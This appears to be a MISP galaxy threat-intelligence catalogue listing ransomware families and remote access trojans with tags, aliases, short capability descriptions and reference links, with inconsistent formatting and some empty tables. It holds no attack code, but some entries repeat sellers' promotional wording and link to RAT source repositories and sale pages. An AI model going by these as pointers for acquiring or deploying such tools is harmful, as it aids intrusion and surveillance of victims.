The tag is: misp-galaxy:ransomware="Cutekitty"

Babax
ransomware
The tag is: misp-galaxy:ransomware="Babax"

Eyecry
ransomware
The tag is: misp-galaxy:ransomware="Eyecry"

Osno
ransomware
The tag is: misp-galaxy:ransomware="Osno"
Loki
ransomware

The tag is: misp-galaxy:ransomware="Loki"

WoodRat
ransomware

The tag is: misp-galaxy:ransomware="WoodRat"

Curator
ransomware

The tag is: misp-galaxy:ransomware="Curator"

32aa
ransomware

The tag is: misp-galaxy:ransomware="32aa"

Vaggen
ransomware

The tag is: misp-galaxy:ransomware="Vaggen"

Clay
ransomware

The tag is: misp-galaxy:ransomware="Clay"

Pizhon
ransomware

The tag is: misp-galaxy:ransomware="Pizhon"

InstallPay
ransomware

The tag is: misp-galaxy:ransomware="InstallPay"
**MetadataBin**

ransomware

The tag is: `misp-galaxy:ransomware="MetadataBin"`

**TechandStrat**

ransomware

The tag is: `misp-galaxy:ransomware="TechandStrat"`

**Mars**

ransomware

The tag is: `misp-galaxy:ransomware="Mars"`

**Scatterbrain**

ransomware

The tag is: `misp-galaxy:ransomware="Scatterbrain"`

**CCECrypt**

ransomware

The tag is: `misp-galaxy:ransomware="CCECrypt"`

**SZ40**

ransomware

The tag is: `misp-galaxy:ransomware="SZ40"`

**Pay2Key**

ransomware

The tag is: `misp-galaxy:ransomware="Pay2Key"`

**Tripoli**

ransomware

The tag is: `misp-galaxy:ransomware="Tripoli"`
Devos

ransomware

The tag is: misp-galaxy:ransomware="Devos"

HowAreYou

ransomware

The tag is: misp-galaxy:ransomware="HowAreYou"

SifreCikis

ransomware

The tag is: misp-galaxy:ransomware="SifreCikis"

68-Random-HEX

ransomware

The tag is: misp-galaxy:ransomware="68-Random-HEX"

RedRoman

ransomware

The tag is: misp-galaxy:ransomware="RedRoman"

MXX

ransomware

The tag is: misp-galaxy:ransomware="MXX"

Exerwa CTF

ransomware

The tag is: misp-galaxy:ransomware="Exerwa CTF"

HelloKitty

ransomware

The tag is: misp-galaxy:ransomware="HelloKitty"
HolidayCheer

ransomware

The tag is: misp-galaxy:ransomware="HolidayCheer"

Joker Korean

ransomware

The tag is: misp-galaxy:ransomware="Joker Korean"

VenomRAT

ransomware

The tag is: misp-galaxy:ransomware="VenomRAT"

FileEngineering

ransomware

The tag is: misp-galaxy:ransomware="FileEngineering"

LandSlide

ransomware

The tag is: misp-galaxy:ransomware="LandSlide"

Mobef-JustFun

ransomware

The tag is: misp-galaxy:ransomware="Mobef-JustFun"

Mobef-JustFun has relationships with:

• similar: misp-galaxy:ransomware="Mobef" with estimative-language:likelihood-probability="likely"

Amjixius

ransomware

The tag is: misp-galaxy:ransomware="Amjixius"

Amjixius is also known as:
DearCry

ransomware

The tag is: *misp-galaxy:ransomware="DearCry"

JoJoCrypter

ransomware

The tag is: *misp-galaxy:ransomware="JoJoCrypter"

RunExeMemory

ransomware

The tag is: *misp-galaxy:ransomware="RunExeMemory"

Pay2Decrypt

ransomware

The tag is: *misp-galaxy:ransomware="Pay2Decrypt"

Tortoise

ransomware

The tag is: *misp-galaxy:ransomware="Tortoise"

EPICALLY

ransomware

The tag is: *misp-galaxy:ransomware="EPICALLY"

Random30

ransomware
The tag is: misp-galaxy:ransomware="Random30"

**Hog**
ransomware

The tag is: misp-galaxy:ransomware="Hog"

**Steel**
ransomware

The tag is: misp-galaxy:ransomware="Steel"

**JohnBorn**
ransomware

The tag is: misp-galaxy:ransomware="JohnBorn"

**Egalyty**
ransomware

The tag is: misp-galaxy:ransomware="Egalyty"

**Namaste**
ransomware

The tag is: misp-galaxy:ransomware="Namaste"

**HDLocker**
ransomware

The tag is: misp-galaxy:ransomware="HDLocker"

**Epsilon**
ransomware

The tag is: misp-galaxy:ransomware="Epsilon"

**DeroHE**
ransomware
The tag is: *misp-galaxy:ransomware="DeroHE"*

**Vovalex**

ransomware

The tag is: *misp-galaxy:ransomware="Vovalex"*

**Bonsoir**

ransomware

The tag is: *misp-galaxy:ransomware="Bonsoir"*

**PulpFictionQuote**

ransomware

The tag is: *misp-galaxy:ransomware="PulpFictionQuote"*

**NAS Data Compromiser**

ransomware

The tag is: *misp-galaxy:ransomware="NAS Data Compromiser"*

**CNH**

ransomware

The tag is: *misp-galaxy:ransomware="CNH"*

**Lucy**

ransomware

The tag is: *misp-galaxy:ransomware="Lucy"*

**OCT**

ransomware

The tag is: *misp-galaxy:ransomware="OCT"*

OCT is also known as:

- OctEncrypt
Pump
ransomware
The tag is: misp-galaxy:ransomware="Pump"

LuciferCrypt
ransomware
The tag is: misp-galaxy:ransomware="LuciferCrypt"

Ziggy
ransomware
The tag is: misp-galaxy:ransomware="Ziggy"

CoderCrypt
ransomware
The tag is: misp-galaxy:ransomware="CoderCrypt"

BlueEagle
ransomware
The tag is: misp-galaxy:ransomware="BlueEagle"

Povisomware
ransomware
The tag is: misp-galaxy:ransomware="Povisomware"

JCrypt
ransomware
The tag is: misp-galaxy:ransomware="JCrypt"

Uh-Oh
ransomware
The tag is: misp-galaxy:ransomware="Uh-Oh"
Mijnal
ransomware
The tag is: misp-galaxy:ransomware="Mijnal"

16x
ransomware
The tag is: misp-galaxy:ransomware="16x"

Lockedv1
ransomware
The tag is: misp-galaxy:ransomware="Lockedv1"

XD Locker
ransomware
The tag is: misp-galaxy:ransomware="XD Locker"

Knot
ransomware
The tag is: misp-galaxy:ransomware="Knot"

Parasite
ransomware
The tag is: misp-galaxy:ransomware="Parasite"

Judge
ransomware
The tag is: misp-galaxy:ransomware="Judge"

DEcovid19
ransomware
The tag is: misp-galaxy:ransomware="DEcovid19"
**Ragnarok**

Ragnarok is a ransomware that targets corporate networks in Big Game Hunting targeted attacks. The ransomware is associated with 'double-extortion' tactic, stealing and publishing files on a data leak site (DLS).

The tag is: `misp-galaxy:ransomware="Ragnarok"`

*Table 5634. Table References*

<table>
<thead>
<tr>
<th>Links</th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.ragnarok">https://malpedia.caad.fkie.fraunhofer.de/details/win.ragnarok</a></td>
</tr>
<tr>
<td><a href="https://borncity.com/win/2021/03/27/tu-darmstadt-opfer-der-ragnarok-ransomware/">https://borncity.com/win/2021/03/27/tu-darmstadt-opfer-der-ragnarok-ransomware/</a></td>
</tr>
</tbody>
</table>

**RAT**

Remote administration tool or remote access tool (RAT), also called sometimes remote access trojan, is a piece of software or programming that allows a remote "operator" to control a system as if they have physical access to that system..

RAT is a cluster galaxy available in JSON format at [this location](https://malpedia.caad.fkie.fraunhofer.de/details/win.ragnarok) The JSON format can be freely reused in your application or automatically enabled in MISP.

*Authors*

Various - raw-data

**Iperius Remote**

Iperius Remote is advertised with these features: Control remotely any computer with Iperius Remote Desktop Free. For remote support or presentations. Ideal for technical assistance. Easy to use and secure.

The tag is: `misp-galaxy:rat="Iperius Remote"`

*Table 5635. Table References*

<table>
<thead>
<tr>
<th>Links</th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="https://www.iperiusremote.com">https://www.iperiusremote.com</a></td>
</tr>
</tbody>
</table>

**TeamViewer**

TeamViewer is a proprietary computer software package for remote control, desktop sharing, online meetings, web conferencing and file transfer between computers.

The tag is: `misp-galaxy:rat="TeamViewer"`

*Table 5636. Table References*
JadeRAT

JadeRAT is just one example of numerous mobile surveillanceware families we've seen in recent months, indicating that actors are continuing to incorporate mobile tools in their attack chains. Threat actor, using a tool called JadeRAT, targets the mobile phones of ethnic minorities in China, notably Uighurs, for the purpose of espionage.

The tag is: misp-galaxy:rat="JadeRAT"

JadeRAT has relationships with:

- similar: misp-galaxy:malpedia="JadeRAT" with estimative-language:likelihood-probability="likely"

Back Orifice

Back Orifice (often shortened to BO) is a computer program designed for remote system administration. It enables a user to control a computer running the Microsoft Windows operating system from a remote location.

The tag is: misp-galaxy:rat="Back Orifice"

Back Orifice is also known as:

- BO

Netbus

NetBus or Netbus is a software program for remotely controlling a Microsoft Windows computer system over a network. It was created in 1998 and has been very controversial for its potential of being used as a backdoor.
The tag is: *misp-galaxy:rat='Netbus'*

Netbus is also known as:

- NetBus

Table 5639. Table References

<table>
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<tr>
<th>Links</th>
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</thead>
</table>

**PoisonIvy**

Poison Ivy is a RAT which was freely available and first released in 2005.

The tag is: *misp-galaxy:rat='PoisonIvy'*

PoisonIvy is also known as:

- Poison Ivy
- Backdoor.Win32.PoisonIvy
- Gen: Trojan.Heur.PT

PoisonIvy has relationships with:

- similar: *misp-galaxy:mitre-malware='PoisonIvy - S0012'* with *estimative-language:likelihood-probability='likely'*
- similar: *misp-galaxy:tool='Poison Ivy'* with *estimative-language:likelihood-probability='likely'*
- similar: *misp-galaxy:tool='poisonivy'* with *estimative-language:likelihood-probability='likely'*
- similar: *misp-galaxy:malpedia='Poison Ivy'* with *estimative-language:likelihood-probability='likely'*
- used-by: *misp-galaxy:threat-actor='Anchor Panda'* with *estimative-language:likelihood-probability='likely'*

Table 5640. Table References

<table>
<thead>
<tr>
<th>Links</th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="https://www.f-secure.com/v-descs/backdoor_w32_poisonivy.shtml">https://www.f-secure.com/v-descs/backdoor_w32_poisonivy.shtml</a></td>
</tr>
</tbody>
</table>

**Sub7**

Sub7, or SubSeven or Sub7Server, is a Trojan horse program.[1] Its name was derived by spelling NetBus backwards ("suBteN") and swapping "ten" with "seven". Sub7 was created by Mobman.
Mobman has not maintained or updated the software since 2004, however an author known as Read101 has carried on the Sub7 legacy.

The tag is: misp-galaxy:rat="Sub7"

Sub7 is also known as:

- SubSeven
- Sub7Server

### Beast Trojan

Beast is a Windows-based backdoor trojan horse, more commonly known in the hacking community as a Remote Administration Tool or a "RAT". It is capable of infecting versions of Windows from 95 to 10.

The tag is: misp-galaxy:rat="Beast Trojan"

### Bifrost

Bifrost is a discontinued backdoor trojan horse family of more than 10 variants which can infect Windows 95 through Windows 10 (although on modern Windows systems, after Windows XP, its functionality is limited). Bifrost uses the typical server, server builder, and client backdoor program configuration to allow a remote attacker, who uses the client, to execute arbitrary code on the compromised machine (which runs the server whose behavior can be controlled by the server editor).

The tag is: misp-galaxy:rat="Bifrost"

### Blackshades

Blackshades is the name of a malicious trojan horse used by hackers to control computers remotely.
The malware targets computers using Microsoft Windows-based operating systems. According to US officials, over 500,000 computer systems have been infected worldwide with the software.

The tag is: `misp-galaxy:rat="Blackshades"`

Blackshades has relationships with:

- similar: `misp-galaxy:tool="Blackshades"` with `estimative-language:likelihood-probability="likely"`

**Table 5644. Table References**

<table>
<thead>
<tr>
<th>Links</th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="https://krebsonsecurity.com/2014/05/blackshades-trojan-users-had-it-coming/">https://krebsonsecurity.com/2014/05/blackshades-trojan-users-had-it-coming/</a></td>
</tr>
</tbody>
</table>

**DarkComet**

DarkComet is a Remote Administration Tool (RAT) which was developed by Jean-Pierre Lesueur (known as DarkCoderSc), an independent programmer and computer security coder from the United Kingdom. Although the RAT was developed back in 2008, it began to proliferate at the start of 2012.

The tag is: `misp-galaxy:rat="DarkComet"`

DarkComet is also known as:

- Dark Comet

DarkComet has relationships with:

- similar: `misp-galaxy:tool="Dark Comet"` with `estimative-language:likelihood-probability="likely"`
- similar: `misp-galaxy:malpedia="DarkComet"` with `estimative-language:likelihood-probability="likely"`

**Table 5645. Table References**

<table>
<thead>
<tr>
<th>Links</th>
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</thead>
<tbody>
<tr>
<td><a href="https://blog.malwarebytes.com/threat-analysis/2012/06/you-dirty-rat-part-1-darkcomet/">https://blog.malwarebytes.com/threat-analysis/2012/06/you-dirty-rat-part-1-darkcomet/</a></td>
</tr>
</tbody>
</table>

**Lanfiltrator**

Backdoor.Lanfiltrator is a backdoor Trojan that gives an attacker unauthorized access to a compromised computer. The detection is used for a family of Trojans that are produced by the Backdoor.Lanfiltrator generator.

The tag is: `misp-galaxy:rat="Lanfiltrator"`

**Table 5646. Table References**
**Win32.HsIdir**

Win32.HsIdir is an advanced remote administrator tool systems was done by the original author HS32-Idir, it is the development of the release made since 2006 Copyright © 2006-2010 HS32-Idir.

The tag is: `misp-galaxy:rat="Win32.HsIdir"`

**Optix Pro**

Optix Pro is a configurable remote access tool or Trojan, similar to SubSeven or BO2K

The tag is: `misp-galaxy:rat="Optix Pro"`

**Back Orifice 2000**

Back Orifice 2000 (often shortened to BO2k) is a computer program designed for remote system administration. It enables a user to control a computer running the Microsoft Windows operating system from a remote location. The name is a pun on Microsoft BackOffice Server software. Back Orifice 2000 is a new version of the famous Back Orifice backdoor trojan (hacker's remote access tool). It was created by the Cult of Dead Cow hackers group in July 1999. Originally the BO2K was released as a source code and utilities package on a CD-ROM. There are reports that some files on that CD-ROM were infected with CIH virus, so the people who got that CD might get infected and spread not only the compiled backdoor, but also the CIH virus.

The tag is: `misp-galaxy:rat="Back Orifice 2000"`

Back Orifice 2000 is also known as:

- BO2k
RealVNC

The software consists of a server and client application for the Virtual Network Computing (VNC) protocol to control another

The tag is: *misp-galaxy:rat="RealVNC"

RealVNC is also known as:

- VNC Connect
- VNC Viewer

Adwind RAT

Backdoor:Java/Adwind is a Java archive (.JAR) file that drops a malicious component onto the machines and runs as a backdoor. When active, it is capable of stealing user information and may also be used to distribute other malware.

The tag is: *misp-galaxy:rat="Adwind RAT"

Adwind RAT is also known as:

- UNRECOM
- UNiversal REmote COntrol Multi-Platform
- Frutas
- AlienSpy
- Unrecom
- Jsocket
- JBifrost

Adwind RAT has relationships with:

- similar: misp-galaxy:tool="Adwind" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:android="Adwind" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:android="Sockrat" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:malpedia="AdWind" with estimative-language:likelihood-probability="likely"

Table 5651. Table References

<table>
<thead>
<tr>
<th>Links</th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="https://www.f-secure.com/v-descs/backdoor_java_adwind.shtml">https://www.f-secure.com/v-descs/backdoor_java_adwind.shtml</a></td>
</tr>
</tbody>
</table>

Albertino Advanced RAT

The tag is: misp-galaxy:rat="Albertino Advanced RAT"

Table 5652. Table References

<table>
<thead>
<tr>
<th>Links</th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="https://www.virustotal.com/en/file/b31812e5b4c63c5b52c9b23e76a5ea9439465ab366a9291c6074bfae5c328e73/analysis/1359376345/">https://www.virustotal.com/en/file/b31812e5b4c63c5b52c9b23e76a5ea9439465ab366a9291c6074bfae5c328e73/analysis/1359376345/</a></td>
</tr>
</tbody>
</table>

Arcom

The malware is a Remote Access Trojan (RAT), known as Arcom RAT, and it is sold on underground forums for $2000.00.

The tag is: misp-galaxy:rat="Arcom"

Table 5653. Table References

<table>
<thead>
<tr>
<th>Links</th>
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</table>

BlackNix

BlackNix rat is a rat coded in delphi.

The tag is: misp-galaxy:rat="BlackNix"

Table 5654. Table References

<table>
<thead>
<tr>
<th>Links</th>
</tr>
</thead>
</table>
Blue Banana

Blue Banana is a RAT (Remote Administration Tool) created purely in Java

The tag is: misp-galaxy:rat="Blue Banana"

Bozok

Bozok, like many other popular RATs, is freely available. The author of the Bozok RAT goes by the moniker “Slayer616” and has created another RAT known as Schwarze Sonne, or “SS-RAT” for short. Both of these RATs are free and easy to find — various APT actors have used both in previous targeted attacks.

The tag is: misp-galaxy:rat="Bozok"

Bozok has relationships with:

- similar: misp-galaxy:malpedia="Bozok" with estimative-language:likelihood-probability="likely"

ClientMesh

ClientMesh is a Remote Administration Application which allows a user to control a number of client PCs from around the world.

The tag is: misp-galaxy:rat="ClientMesh"
CyberGate

CyberGate is a powerful, fully configurable and stable Remote Administration Tool coded in Delphi that is continuously getting developed. Using cybergate you can log the victim's passwords and can also get the screen shots of his computer's screen.

The tag is: misp-galaxy:rat="CyberGate"

CyberGate has relationships with:

- similar: misp-galaxy:malpedia="CyberGate" with estimative-language:likelihood-probability="likely"

Table 5658. Table References

<table>
<thead>
<tr>
<th>Links</th>
<th></th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="http://www.hackersthirst.com/2011/03/cybergate-rat-hacking-facebook-twitter.html">link</a></td>
<td></td>
</tr>
<tr>
<td><a href="http://www.nbcnews.com/id/41584097/ns/technology_and_science-security/t/cybergate-leaked-emails-hint-corporate-hacking-conspiracy/">link</a></td>
<td></td>
</tr>
</tbody>
</table>

Dark DDoSeR

The tag is: misp-galaxy:rat="Dark DDoSeR"

Table 5659. Table References

<table>
<thead>
<tr>
<th>Links</th>
<th></th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="http://meinblogzumtesten.blogspot.lu/2013/05/dark-ddoser-v56c-cracked.html">link</a></td>
<td></td>
</tr>
</tbody>
</table>

DarkRat

In March 2017, Fujitsu Cyber Threat Intelligence uncovered a newly developed remote access tool referred to by its developer as ‘Dark RAT’ – a tool used to steal sensitive information from victims. Offered as a Fully Undetectable build (FUD) the RAT has a tiered price model including 24/7 support and an Android version. Android malware has seen a significant rise in interest and in 2015 this resulted in the arrests of a number of suspects involved in the infamous DroidJack malware.

The tag is: misp-galaxy:rat="DarkRat"

DarkRat is also known as:

- DarkRAT

Table 5660. Table References

<table>
<thead>
<tr>
<th>Links</th>
<th></th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="https://www.infosecurity-magazine.com/blogs/the-dark-rat/">link</a></td>
<td></td>
</tr>
<tr>
<td><a href="http://darkratphp.blogspot.lu/">link</a></td>
<td></td>
</tr>
</tbody>
</table>
Greame

The tag is: misp-galaxy:rat="Greame"

Table 5661. Table References

<table>
<thead>
<tr>
<th>Links</th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="https://sites.google.com/site/greymecompany/greame-rat-project">https://sites.google.com/site/greymecompany/greame-rat-project</a></td>
</tr>
</tbody>
</table>

HawkEye

HawkEye is a popular RAT that can be used as a keylogger, it is also able to identify login events and record the destination, username, and password.

The tag is: misp-galaxy:rat="HawkEye"

Table 5662. Table References

<table>
<thead>
<tr>
<th>Links</th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="http://securityaffairs.co/wordpress/54837/hacking/one-stop-shop-hacking.html">http://securityaffairs.co/wordpress/54837/hacking/one-stop-shop-hacking.html</a></td>
</tr>
</tbody>
</table>

jRAT

jRAT is the cross-platform remote administrator tool that is coded in Java, Because its coded in Java it gives jRAT possibilities to run on all operation systems, Which includes Windows, Mac OSX and Linux distributions.

The tag is: misp-galaxy:rat="jRAT"

jRAT is also known as:

- JacksBot

jRAT has relationships with:

- similar: misp-galaxy:malpedia="jRAT" with estimative-language:likelihood-probability="likely"

Table 5663. Table References

<table>
<thead>
<tr>
<th>Links</th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="https://www.rekings.com/shop/jrat/">https://www.rekings.com/shop/jrat/</a></td>
</tr>
</tbody>
</table>

jSpy

jSpy is a Java RAT.

The tag is: misp-galaxy:rat="jSpy"
jSpy has relationships with:

- similar: misp-galaxy:malpedia="jSpy" with estimative-language:likelihood-probability="likely"

### LuxNET

Just saying that this is a very badly coded RAT by the biggest skid in this world, that is XilluX. The connection is very unstable, the GUI is always flickering because of the bad Multi-Threading and many more bugs.

The tag is: `misp-galaxy:rat="LuxNET"`

### NJRat

NJRat is a remote access trojan (RAT), first spotted in June 2013 with samples dating back to November 2012. It was developed and is supported by Arabic speakers and mainly used by cybercrime groups against targets in the Middle East. In addition to targeting some governments in the region, the trojan is used to control botnets and conduct other typical cybercrime activity. It infects victims via phishing attacks and drive-by downloads and propagates through infected USB keys or networked drives. It can download and execute additional malware, execute shell commands, read and write registry keys, capture screenshots, log keystrokes, and spy on webcams.

The tag is: `misp-galaxy:rat="NJRat"

NJRat is also known as:

- Njw0rm

NJRat has relationships with:

- similar: misp-galaxy:rat="Kiler RAT" with estimative-language:likelihood-probability="likely"
Pandora

Remote administrator tool that has been developed for Windows operation system. With advanced features and stable structure, Pandora's structure is based on advanced client / server architecture. was configured using modern technology.

The tag is: misp-galaxy:rat="Pandora"

Table 5667. Table References

<table>
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<th>Links</th>
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</table>

Predator Pain

Unlike Zeus, Predator Pain and Limitless are relatively simple keyloggers. They indiscriminately steal web credentials and mail client credentials, as well as capturing keystrokes and screen captures. The output is human readable, which is good if you are managing a few infected machines only, but the design doesn’t scale well when there are a lot of infected machines and logs involved.

The tag is: misp-galaxy:rat="Predator Pain"

Predator Pain is also known as:

- PredatorPain

Predator Pain has relationships with:

- similar: misp-galaxy:malpedia="HawkEye Keylogger" with estimative-language:likelihood-probability="likely"

Table 5668. Table References

<table>
<thead>
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<th>Links</th>
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</table>

Punisher RAT

Remote administration tool

The tag is: misp-galaxy:rat="Punisher RAT"

Table 5669. Table References

<table>
<thead>
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<th>Links</th>
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</thead>
</table>
SpyGate

This is tool that allow you to control your computer form anywhere in world with full support to unicode language.

The tag is: misp-galaxy:rat="SpyGate"

Table 5670. Table References

<table>
<thead>
<tr>
<th>Links</th>
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</thead>
<tbody>
<tr>
<td><a href="https://www.rekings.com/spygate-rat-3-2/">https://www.rekings.com/spygate-rat-3-2/</a></td>
</tr>
<tr>
<td><a href="https://www.symantec.com/security_response/attacksignatures/detail.jsp%3Fasid%3D27950">https://www.symantec.com/security_response/attacksignatures/detail.jsp%3Fasid%3D27950</a></td>
</tr>
<tr>
<td><a href="http://spygate-rat.blogspot.lu/">http://spygate-rat.blogspot.lu/</a></td>
</tr>
</tbody>
</table>

Small-Net

RAT

The tag is: misp-galaxy:rat="Small-Net"

Small-Net is also known as:

- SmallNet

Table 5671. Table References

<table>
<thead>
<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="http://small-net-rat.blogspot.lu/">http://small-net-rat.blogspot.lu/</a></td>
</tr>
</tbody>
</table>

Vantom

Vantom is a free RAT with good option and very stable.

The tag is: misp-galaxy:rat="Vantom"

Table 5672. Table References

<table>
<thead>
<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="https://www.rekings.com/vantom-rat/">https://www.rekings.com/vantom-rat/</a></td>
</tr>
</tbody>
</table>

Xena

Xena RAT is a fully-functional, stable, state-of-the-art RAT, coded in a native language called Delphi, it has almost no dependencies.
XtremeRAT

This malware has been used in targeted attacks as well as traditional cybercrime. During our investigation we found that the majority of XtremeRAT activity is associated with spam campaigns that typically distribute Zeus variants and other banking-focused malware.

Netwire

NetWire has a built-in keylogger that can capture inputs from peripheral devices such as USB card readers.

Gh0st RAT

Gh0st RAT is a Trojan horse for the Windows platform that the operators of GhostNet used to hack into some of the most sensitive computer networks on Earth. It is a cyber spying computer program.

Gh0st RAT has relationships with:

- similar: misp-galaxy:malpedia="Ghost RAT" with estimative-language:likelihood-probability="likely"
- used-by: misp-galaxy:threat-actor="Anchor Panda" with estimative-language:likelihood-probability="likely"
Plasma RAT

Plasma RAT’s stub is fairly advanced, having many robust features. Some of the features include botkilling, Cryptocurrencies Mining (CPU and GPU), persistence, anti-analysis, torrent seeding, AV killer, 7 DDoS methods and a keylogger. The RAT is coded in VB.Net. There is also a Botnet version of it (Plasma HTTP), which is pretty similar to the RAT version.

The tag is: misp-galaxy:rat="Plasma RAT"

Babylon

Babylon is a highly advanced remote administration tool with no dependencies. The server is developed in C++ which is an ideal language for high performance and the client is developed in C#(.Net Framework 4.5)

The tag is: misp-galaxy:rat="Babylon"

Imminent Monitor

RAT

The tag is: misp-galaxy:rat="Imminent Monitor"

DroidJack

DroidJack is a RAT (Remote Access Trojan/Remote Administration Tool) nature of remote accessing, monitoring and managing tool (Java based) for Android mobile OS. You can use it to perform a complete remote control to any Android devices infected with DroidJack through your PC. It comes with powerful function and user-friendly operation – even allows attackers to fully take over the
mobile phone and steal, record the victim's private data wilfully.

The tag is: `misp-galaxy:rat="DroidJack"

Table 5680. Table References

<table>
<thead>
<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="http://droidjack.net/">http://droidjack.net/</a></td>
</tr>
</tbody>
</table>

**Quasar RAT**

Quasar is a fast and light-weight remote administration tool coded in C#. Providing high stability and an easy-to-use user interface

The tag is: `misp-galaxy:rat="Quasar RAT"

Quasar RAT has relationships with:

- similar: `misp-galaxy:malpedia="Quasar RAT"` with estimative-language:likelihood-probability="likely"

Table 5681. Table References

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<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="https://github.com/quasar/QuasarRAT">https://github.com/quasar/QuasarRAT</a></td>
</tr>
</tbody>
</table>

**Dendroid**

Dendroid is malware that affects Android OS and targets the mobile platform. It was first discovered in early of 2014 by Symantec and appeared in the underground for sale for $300. Some things were noted in Dendroid, such as being able to hide from emulators at the time. When first discovered in 2014 it was one of the most sophisticated Android remote administration tools known at that time. It was one of the first Trojan applications to get past Google's Bouncer and caused researchers to warn about it being easier to create Android malware due to it. It also seems to have follow in the footsteps of Zeus and SpyEye by having simple-to-use command and control panels. The code appeared to be leaked somewhere around 2014. It was noted that an apk binder was included in the leak, which provided a simple way to bind Dendroid to legitimate applications.

The tag is: `misp-galaxy:rat="Dendroid"

Dendroid has relationships with:

- similar: `misp-galaxy:mitre-malware="Dendroid - S0301"` with estimative-language:likelihood-probability="likely"
**Ratty**

A Java R.A.T. program

The tag is: `misp-galaxy:rat="Ratty"`

Ratty has relationships with:

- similar: `misp-galaxy:malpedia="Ratty"` with `estimative-language:likelihood-probability="likely"`

**RaTRon**

Java RAT

The tag is: `misp-galaxy:rat="RaTRon"`

**Arabian-Attacker RAT**

The tag is: `misp-galaxy:rat="Arabian-Attacker RAT"`

**Androrat**

Androrat is a client/server application developed in Java Android for the client side and in Java/Swing for the Server.

The tag is: `misp-galaxy:rat="Androrat"`
Table 5686. Table References

<table>
<thead>
<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="https://latesthackingnews.com/2015/05/31/how-to-hack-android-phones-with-androrat/">https://latesthackingnews.com/2015/05/31/how-to-hack-android-phones-with-androrat/</a></td>
</tr>
<tr>
<td><a href="https://github.com/wszf/androrat">https://github.com/wszf/androrat</a></td>
</tr>
</tbody>
</table>

**Adzok**

Remote Administrator

The tag is: `misp-galaxy:rat="Adzok"`

Table 5687. Table References

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<tbody>
<tr>
<td><a href="http://adzok.com/">http://adzok.com/</a></td>
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</table>

**Schwarze-Sonne-RAT**

The tag is: `misp-galaxy:rat="Schwarze-Sonne-RAT"`

Schwarze-Sonne-RAT is also known as:

- SS-RAT
- Schwarze Sonne

Table 5688. Table References

<table>
<thead>
<tr>
<th>Links</th>
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</thead>
<tbody>
<tr>
<td><a href="https://github.com/mwsrc/Schwarze-Sonne-RAT">https://github.com/mwsrc/Schwarze-Sonne-RAT</a></td>
</tr>
</tbody>
</table>

**Cyber Eye RAT**

The tag is: `misp-galaxy:rat="Cyber Eye RAT"`

Table 5689. Table References

<table>
<thead>
<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="https://www.indetectables.net/viewtopic.php?t=24245">https://www.indetectables.net/viewtopic.php?t=24245</a></td>
</tr>
</tbody>
</table>

**Batch NET**

The tag is: `misp-galaxy:rat="Batch NET"`

**RWX RAT**

The tag is: `misp-galaxy:rat="RWX RAT"`
Spy-Net is a software that allow you to control any computer in world using Windows Operating System. He is back using new functions and good options to give you full control of your remote computer. Stable and fast, this software offer to you a good interface, creating a easy way to use all his functions.

The tag is: misp-galaxy:rat="Spynet"

CTOS

The tag is: misp-galaxy:rat="CTOS"

Virus RAT

The tag is: misp-galaxy:rat="Virus RAT"

Atelier Web Remote Commander

The tag is: misp-galaxy:rat="Atelier Web Remote Commander"
**drat**

A distributed, parallelized (Map Reduce) wrapper around Apache™ RAT to allow it to complete on large code repositories of multiple file types where Apache™ RAT hangs forever.

The tag is: `misp-galaxy:rat="drat"`

*Table 5695. Table References*

<table>
<thead>
<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="https://github.com/chrismattmann/drat">https://github.com/chrismattmann/drat</a></td>
<td></td>
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</tbody>
</table>

**MoSucker**

MoSucker is a powerful backdoor - hacker's remote access tool.

The tag is: `misp-galaxy:rat="MoSucker"`

*Table 5696. Table References*

<table>
<thead>
<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="https://www.f-secure.com/v-descs/mosuck.shtml">https://www.f-secure.com/v-descs/mosuck.shtml</a></td>
<td></td>
</tr>
</tbody>
</table>

**Theef**

The tag is: `misp-galaxy:rat="Theef"`

*Table 5697. Table References*

<table>
<thead>
<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="http://www.grayhatforum.org/thread-4373-post-5213.html#pid5213">http://www.grayhatforum.org/thread-4373-post-5213.html#pid5213</a></td>
<td></td>
</tr>
<tr>
<td><a href="http://www.spy-emergency.com/research/T/Theef_Download_Creator.html">http://www.spy-emergency.com/research/T/Theef_Download_Creator.html</a></td>
<td></td>
</tr>
<tr>
<td><a href="http://www.spy-emergency.com/research/T/Theef.html">http://www.spy-emergency.com/research/T/Theef.html</a></td>
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</tr>
</tbody>
</table>

**ProRat**

ProRat is a Microsoft Windows based backdoor trojan, more commonly known as a Remote Administration Tool. As with other trojan horses it uses a client and server. ProRat opens a port on the computer which allows the client to perform numerous operations on the server (the machine being controlled).

The tag is: `misp-galaxy:rat="ProRat"`

*Table 5698. Table References*

<table>
<thead>
<tr>
<th>Links</th>
<th></th>
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<tbody>
<tr>
<td><a href="http://prorat.software.informer.com/">http://prorat.software.informer.com/</a></td>
<td></td>
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</tbody>
</table>
**Setro**

The tag is: `misp-galaxy:rat="Setro"`

*Table 5699. Table References*

<table>
<thead>
<tr>
<th>Links</th>
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</thead>
<tbody>
<tr>
<td><a href="https://sites.google.com/site/greymecompany/setro-rat-project">https://sites.google.com/site/greymecompany/setro-rat-project</a></td>
</tr>
</tbody>
</table>

**Indetectables RAT**

The tag is: `misp-galaxy:rat="Indetectables RAT"`

*Table 5700. Table References*

<table>
<thead>
